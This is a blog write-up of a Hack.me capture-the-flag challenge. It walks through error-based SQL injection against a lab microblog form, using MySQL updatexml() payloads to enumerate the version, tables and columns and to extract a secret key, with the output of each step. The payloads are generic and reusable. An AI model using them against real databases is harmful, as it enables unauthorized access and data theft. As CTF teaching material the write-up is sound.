[HACKME] Hack_My_Microblog

I start the Hack.me series today with a challenge made by a friend (decoder-ap): https://hack.me/102464/hack-my-microblog12.html. The objective is to find a secret key hidden into the website.

ANALYZING THE TARGET

When I started the sandbox I had a submit form with two input field, the first one is my nickname the second one allowed me to insert some random text. I tried to see if it was vulnerable to SQLi appending an apix into the first field but I got a redirect on the same page. But when I tried to do the same with the second field I got:

Ops..r u trying to hack me? hope this helps =>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')' at line 2

Cool! Let’s exploit this SQLi.

EXPLOITATION

I assumed that the SQL query was an INSERT and after some reasearch I found an interesting PDF of Exploit-DB. I used Updatexml() function to exploit the SQLi. First of all I found the MySQL version:

' or updatexml(1, concat(0x7e, (version())), 0) or '

And I got:

Ops..r u trying to hack me? hope this helps =>XPATH syntax error: '~5.1.65-community-log'

So the MySQL version is 5.1.65. Now I checked the tables:

' or updatexml(0, concat(0x7e, (SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1)), 0) or '

This was the output:

Ops..r u trying to hack me? hope this helps =>XPATH syntax error: '~comments_text'

The first table that I found is comments_text. I used the LIMIT function so I increased the value to check if there are more then this one:

' or updatexml(0, concat(0x7e, (SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() LIMIT 1,1)), 0) or '

The output:

Ops..r u trying to hack me? hope this helps =>XPATH syntax error: '~secret'

Bingo! Now I retrieved the columns names:

' or updatexml(0, concat(0x7e, (SELECT concat(column_name) FROM information_schema.columns WHERE table_name='secret' LIMIT 0,1)), 0) or '

I got the first field:

Ops..r u trying to hack me? hope this helps =>XPATH syntax error: '~userid'

Now increase the LIMIT value:

' or updatexml(0, concat(0x7e, (SELECT concat(column_name) FROM information_schema.columns WHERE table_name='secret' LIMIT 1,1)), 0) or '

I got the second value:

Ops..r u trying to hack me? hope this helps =>XPATH syntax error: '~secretkey'

Now I just extracted data:

' or updatexml(0, concat(0x7e, (SELECT concat_ws(':', userid, secretkey) FROM secret LIMIT 0,1)), 0) or '

And I got the key!

Advertisements
[HACKME] Hack_My_Microblog

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s